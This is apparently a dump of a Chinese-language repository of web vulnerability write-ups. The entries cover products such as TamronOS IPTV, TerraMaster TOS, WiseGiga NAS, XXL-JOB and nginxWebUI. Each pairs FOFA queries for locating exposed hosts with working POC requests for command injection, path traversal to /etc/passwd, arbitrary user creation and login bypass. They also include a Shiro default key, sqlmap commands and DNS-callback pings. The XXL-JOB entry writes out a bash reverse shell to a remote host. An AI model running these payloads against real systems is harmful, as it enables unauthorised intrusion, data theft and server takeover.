id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{ 33 | ``` 34 | 35 | ![image-20220524153448336](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241534389.png) -------------------------------------------------------------------------------- /Web应用漏洞/TamronOS IPTV系统 ping 任意命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # TamronOS IPTV系统 ping 任意命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | TamronOS IPTV系统 api/ping 存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | TamronOS IPTV系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TamronOS-IPTV系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101926621.png) 26 | 27 | 28 | 29 | 漏洞POC为 30 | 31 | 32 | 33 | ```plain 34 | /api/ping?count=5&host=;id; 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101927800.png) -------------------------------------------------------------------------------- /Web应用漏洞/TamronOS IPTV系统 submit 任意用户创建漏洞.md: -------------------------------------------------------------------------------- 1 | # TamronOS IPTV系统 submit 任意用户创建漏洞 2 | 3 | ## 漏洞描述 4 | 5 | TamronOS IPTV系统 /api/manager/submit 存在任意用户创建漏洞,攻击者通过漏洞可以任意用户创建进入后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | TamronOS IPTV系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TamronOS-IPTV系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101926166.png) 26 | 27 | 28 | 29 | 漏洞POC为 30 | 31 | 32 | 33 | ```plain 34 | /api/manager/submit?group=1&username=test&password=123456 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101926524.png) 40 | 41 | 42 | 43 | ```plain 44 | user: test 45 | pass: 123456 46 | ``` 47 | 48 | 49 | 50 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101926288.png) -------------------------------------------------------------------------------- /Web应用漏洞/TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186.md: -------------------------------------------------------------------------------- 1 | # TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186 2 | 3 | ## 漏洞描述 4 | 5 | TerraMaster TOS <= 4.2.06中的电子邮件注入允许未经身份验证的远程攻击者利用忘记密码功能,重置账号密码实现账号接管。 6 | 7 | ## 漏洞影响 8 | 9 | TerraMaster TOS < 4.2.06 10 | 11 | ## FOFA 12 | 13 | "TerraMaster" && header="TOS" 14 | 15 | ## 漏洞复现 16 | 17 | 首先需要知道已知用户名,可以参考 TerraMaster TOS 用户枚举漏洞 CVE-2020-28185 获取已知的用户名 18 | 19 | 重置页面输入获取的账号和邮箱 20 | 21 | 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101947245.png) 24 | 25 | 26 | 27 | 点击确定,抓包更换邮箱接收验证码 28 | 29 | 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101947911.png) 32 | 33 | 34 | 35 | 通过接收的验证码即可更换账号密码登录后台 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101947596.png) -------------------------------------------------------------------------------- /Web应用漏洞/TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md: -------------------------------------------------------------------------------- 1 | # TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187 2 | 3 | ## 漏洞描述 4 | 5 | TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | TerraMaster TOS < 4.2.06 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "TerraMaster" && header="TOS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆后访问,验证漏洞的POC为 22 | 23 | 24 | 25 | ```plain 26 | /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd 27 | ``` 28 | 29 | 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101948100.png) -------------------------------------------------------------------------------- /Web应用漏洞/TerraMaster TOS 用户枚举漏洞 CVE-2020-28185.md: -------------------------------------------------------------------------------- 1 | # TerraMaster TOS 用户枚举漏洞 CVE-2020-28185 2 | 3 | ## 漏洞描述 4 | 5 | TerraMaster TOS 存在用户枚举漏洞,通过wizard/initialise.php页面的username参数即可枚举系统中的用户,以及泄露邮箱信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | TerraMaster TOS < 4.2.06 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "TerraMaster" && header="TOS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 漏洞点来源于找回密码的用户存在校验 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101946299.png) 26 | 27 | 28 | 29 | 输入用户名 admin 点击确定,查看Burp捕获的包 30 | 31 | 32 | 33 | 其中有一个请求包用于确认用户admin是否存在 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101946900.png) 36 | 37 | 38 | 39 | 存在则返回用户的邮箱信息 -------------------------------------------------------------------------------- /Web应用漏洞/WiseGiga NAS down_data.php 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # WiseGiga NAS down_data.php 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | WiseGiga 是一家销售网络连接存储(NAS )产品的韩国公司。 6 | 7 | WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | WiseGiga NAS 13 | ``` 14 | 15 | ## 网络测绘 16 | 17 | ``` 18 | app="WISEGIGA-NAS" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![image-20220628113649787](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281136917.png) 26 | 27 | 验证POC 28 | 29 | ``` 30 | /down_data.php?filename=../../../../../../../../../../../../../../etc/passwd 31 | ``` 32 | 33 | ![image-20220628113749412](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281137504.png) -------------------------------------------------------------------------------- /Web应用漏洞/WiseGiga NAS group.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # WiseGiga NAS group.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | WiseGiga 是一家销售网络连接存储(NAS )产品的韩国公司。 6 | 7 | WiseGiga NAS group.php文件存在远程命令执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | WiseGiga NAS 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | app="WISEGIGA-NAS" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![image-20220628113649787](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281144970.png) 26 | 27 | 验证POC 28 | 29 | ``` 30 | /admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt 31 | ``` 32 | 33 | ![image-20220628114731029](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281147112.png) 34 | 35 | ``` 36 | /admin/1.txt 37 | ``` 38 | 39 | ![image-20220628114740534](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281147595.png) -------------------------------------------------------------------------------- /Web应用漏洞/XXL-JOB 任务调度中心 后台任意命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # XXL-JOB 任务调度中心 后台任意命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | XXL-JOB 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="XXL-JOB" || title="任务调度中心" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录后台增加一个任务 22 | 23 | - 默认口令 admin/123456 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101914314.png) 26 | 27 | - 注意运行模式需要为 GLUE(shell) 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915543.png) 30 | 31 | 点击 GLUE IDE编辑脚本 32 | 33 | 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915236.png) 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915343.png) 40 | 41 | 42 | 43 | 执行探测出网,和任务调用是否可执行 44 | 45 | 46 | 47 | 反弹一个shell 48 | 49 | 50 | 51 | ```plain 52 | #!/bin/bash 53 | bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1' 54 | ``` 55 | 56 | 57 | 58 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915912.png) -------------------------------------------------------------------------------- /Web应用漏洞/eGroupWare spellchecker.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # eGroupWare spellchecker.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | *eGroupWare*是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php 文件中存在命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | eGroupWare 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="EGROUPWARE-产品" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220524171233435](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241712519.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C 29 | ``` 30 | 31 | ![image-20220524171251702](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241712784.png) -------------------------------------------------------------------------------- /Web应用漏洞/imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | imo 云办公室 由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | imo 云办公室 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="iMO-云办公室" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220524171455819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241714963.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php 29 | ``` 30 | 31 | ![image-20220524171627797](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241716860.png) -------------------------------------------------------------------------------- /Web应用漏洞/kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734.md: -------------------------------------------------------------------------------- 1 | # kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734 2 | 3 | ## 漏洞描述 4 | 5 | kkFileView getCorsFile 3.6.0 版本以下存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的任意文件,获取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | kkFileView getCorsFile <= 3.6.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="kkFileView" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220524172325491](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241723549.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /getCorsFile?urlPath=file:///etc/passwd 29 | ``` 30 | 31 | ![image-20220524172414993](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241724070.png) -------------------------------------------------------------------------------- /Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # nginxWebUI cmdOver 后台命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | nginxWebUI 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="nginxwebui" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220628112638269](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281126396.png) 24 | 25 | 26 | 27 | 验证请求包 28 | 29 | ``` 30 | POST /adminPage/remote/cmdOver 31 | 32 | remoteId=local&cmd=start|id&interval=1 33 | ``` 34 | 35 | ![image-20220628112938342](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281129491.png) -------------------------------------------------------------------------------- /Web应用漏洞/三汇SMG 网关管理软件 down.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 三汇SMG 网关管理软件 down.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 三汇SMG 网关管理软件 down.php文件中存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 三汇SMG 网关管理软件 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="text ml10 mr20" && title="网关管理软件" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202203180949105.png) 24 | 25 | 存在漏洞的页面为 **down.php** 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202203180949106.png) 28 | 29 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202203180949107.png) 30 | -------------------------------------------------------------------------------- /Web应用漏洞/中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 中科网威 NPFW防火墙 存在任意文件读取漏洞,由于代码过滤不足,可读取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 中科网威 NPFW防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "中科网威" && "/direct" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101852340.png) 24 | 25 | 发送请求包 26 | 27 | ```php 28 | POST /direct/polling/CommandsPolling.php HTTP/1.1 29 | Host: 30 | Cookie: PHPSESSID=014d2705856e1df139772db42ccbaf9f 31 | Content-Length: 47 32 | Cache-Control: max-age=0 33 | Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92" 34 | Sec-Ch-Ua-Mobile: ?0 35 | Upgrade-Insecure-Requests: 1 36 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 37 | Content-Type: application/x-www-form-urlencoded 38 | Connection: close 39 | 40 | command=ping&filename=%2Fetc%2Fpasswd&cmdParam= 41 | ``` 42 | 43 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101852498.png) -------------------------------------------------------------------------------- /Web应用漏洞/久其财务报表 download.jsp 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 久其财务报表 download.jsp 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 久其财务报表 download.jsp 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 久其财务报表 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="/netrep/" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录路径如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101905343.png) 26 | 27 | 28 | 29 | 发送请求包 30 | 31 | 32 | 33 | ```plain 34 | POST /netrep/ebook/browse/download.jsp HTTP/1.1 35 | Host: 36 | Content-Length: 55 37 | Cache-Control: max-age=0 38 | Upgrade-Insecure-Requests: 1 39 | Origin: http://114.251.113.53:7002 40 | Content-Type: application/x-www-form-urlencoded 41 | 42 | jpgfilepath=c:\windows\win.ini 43 | ``` 44 | 45 | 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101905484.png) -------------------------------------------------------------------------------- /Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 云时空 社会化商业ERP为 Shiro框架 ,使用了默认的密钥导致了远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 云时空 社会化商业ERP系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="云时空社会化商业ERP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251024908.png) 24 | 25 | 默认密钥为 26 | 27 | ``` 28 | kPH+bIxk5D2deZiIxcaaaA== 29 | ``` 30 | 31 | ![image-20220525102542474](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251025549.png) 32 | 33 | -------------------------------------------------------------------------------- /Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 云时空 社会化商业ERP系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="云时空社会化商业ERP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251026873.png) 24 | 25 | 使用SQLmap验证漏洞 26 | 27 | ``` 28 | sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin" 29 | ``` 30 | 31 | ![image-20220525103355733](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251033940.png) -------------------------------------------------------------------------------- /Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # 众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 众望网络 微议管理系统 后台updatefile.html页面任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 众望网络 微议管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "微议管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525103602413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251036461.png) 24 | 25 | 默认口令 amdin/admin, 服务器更新界面上传PHP文件 26 | 27 | ![image-20220525103740928](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251037014.png) 28 | 29 | 访问页面 30 | 31 | ``` 32 | /Updatefiles/文件名.php 33 | ``` -------------------------------------------------------------------------------- /Web应用漏洞/会捷通云视讯 list 目录文件泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 会捷通云视讯 list 目录文件泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 会捷通云视讯 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="/him/api/rest/v1.0/node/role" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101859423.png) 26 | 27 | 访问Url 28 | 29 | 30 | 31 | ```plain 32 | /him/api/rest/V1.0/system/log/list?filePath=../ 33 | ``` 34 | 35 | 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101859690.png) 38 | 39 | 40 | 41 | ## -------------------------------------------------------------------------------- /Web应用漏洞/会捷通云视讯 登录绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # 会捷通云视讯 登录绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 会捷通云视讯存在登陆绕过漏洞,通过拦截特定的请求包并修改即可获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 会捷通云视讯 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="/him/api/rest/v1.0/node/role" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101858604.png) 26 | 27 | 28 | 29 | 输入任意账号密码抓包 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101858666.png) 34 | 35 | 修改返回包为如下后放包则成功绕过登录 36 | 37 | 38 | 39 | ```plain 40 | HTTP/1.1 200 41 | Server: Hsengine/1.4.1 42 | Date: Mon, 17 May 2021 16:13:43 GMT 43 | Content-Type: application/json;charset=UTF-8 44 | Connection: close 45 | X-Frame-Options: SAMEORIGIN 46 | X-Content-Type-Options: nosniff 47 | X-XSS-Protection: 1; mode=block 48 | Accept-Ranges: bytes 49 | Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept 50 | Content-Length: 61 51 | 52 | {"token":null,"result":null} 53 | ``` 54 | 55 | 56 | 57 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101858916.png) -------------------------------------------------------------------------------- /Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 杭州吉拉科技有限公司多个系统存在目录遍历漏洞,由于 /Business/ 访问控制不严,攻击者可利用该漏洞获取敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | 吉拉科技 LVS精益价值管理系统 10 | 11 | ## FOFA 12 | 13 | ``` 14 | "Supperd By 吉拉科技" 15 | ``` 16 | 17 | ## 漏洞复现 18 | 19 | 登录页面 20 | 21 | ![image-20220525143613247](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251436458.png) 22 | 23 | 验证POC 24 | 25 | ``` 26 | /Business/ 27 | ``` 28 | 29 | ![image-20220525143712687](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251437757.png) -------------------------------------------------------------------------------- /Web应用漏洞/图创软件 图书馆站群管理系统 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 图创软件 图书馆站群管理系统 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 图创软件 图书馆站群管理系统 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 图创软件 图书馆站群管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "广州图创" && country="CN" && body="/interlib/common/" 17 | ``` 18 | 19 | 20 | 21 | ## 漏洞复现 22 | 23 | 登录页面如下 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101854438.png) 26 | 27 | 漏洞请求包为 28 | 29 | 30 | 31 | ```plain 32 | GET /interlib/report/ShowImage?localPath=C:\Windows\system.ini HTTP/1.1 33 | Host: 34 | Content-Length: 4 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101854283.png) 40 | 41 | 42 | 43 | 成功读取 system.ini 文件 -------------------------------------------------------------------------------- /Web应用漏洞/天融信 DLP 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 天融信 DLP 未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 天融信DLP存在未授权访问漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 天融信DLP 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | POC为 16 | 17 | ```plain 18 | 默认用户superman的uid=1 19 | POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1 20 | ``` 21 | 22 | -------------------------------------------------------------------------------- /Web应用漏洞/天融信 TopApp-LB 命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 天融信 TopApp-LB 命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 天融信负载均衡TopApp-LB系统存在任意命令执行 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | 天融信负载均衡TopApp-LB 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="天融信-TopApp-LB-负载均衡系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录界面中存在命令执行 22 | 23 | 24 | 25 | 账号:**1;ping 6km5dk.ceye.io;echo** 26 | 27 | 密码:**任意** 28 | 29 | 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091921374.png) 32 | 33 | 34 | 35 | 成功收到请求 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091921379.png) -------------------------------------------------------------------------------- /Web应用漏洞/天融信 TopApp-LB系统 任意登陆.md: -------------------------------------------------------------------------------- 1 | # 天融信 TopApp-LB系统 任意登陆 2 | 3 | ## 漏洞描述 4 | 5 | 天融信负载均衡TopApp-LB系统无需密码可直接登陆,查看敏感信息 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | 天融信负载均衡TopApp-LB 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="天融信-TopApp-LB-负载均衡系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 在登录页面中输入,账号:**任意账号** 密码:**;id** 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091919361.png) 26 | 27 | 28 | 29 | 成功登录 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091919022.png) -------------------------------------------------------------------------------- /Web应用漏洞/孚盟云 AjaxMethod.ashx SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 孚盟云 AjaxMethod.ashx SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 孚盟云 AjaxMethod.ashx文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 孚盟云 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="孚盟云 " 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | 24 | 25 | ![image-20220210184424096](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101844185.png) 26 | 27 | 28 | 29 | 验证POC 30 | 31 | 32 | 33 | ```plain 34 | http://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27 35 | ``` 36 | 37 | ![image-20220210184439151](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101844214.png) 38 | 39 | 40 | 41 | 使用Sqlmap 42 | 43 | 44 | 45 | ```plain 46 | sqlmap -u "http://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y" -p Name --batch --random-agent --dbms mssql --dbs 47 | ``` 48 | 49 | 50 | 51 | ![image-20220210184456424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101844599.png) -------------------------------------------------------------------------------- /Web应用漏洞/安天 高级可持续威胁安全检测系统 越权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 安天 高级可持续威胁安全检测系统 越权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 安天 高级可持续威胁安全检测系统 存在越权访问漏洞,攻击者可以通过工具修改特定的返回包导致越权后台查看敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 安天 高级可持续威胁安全检测系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="高级可持续威胁安全检测系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | 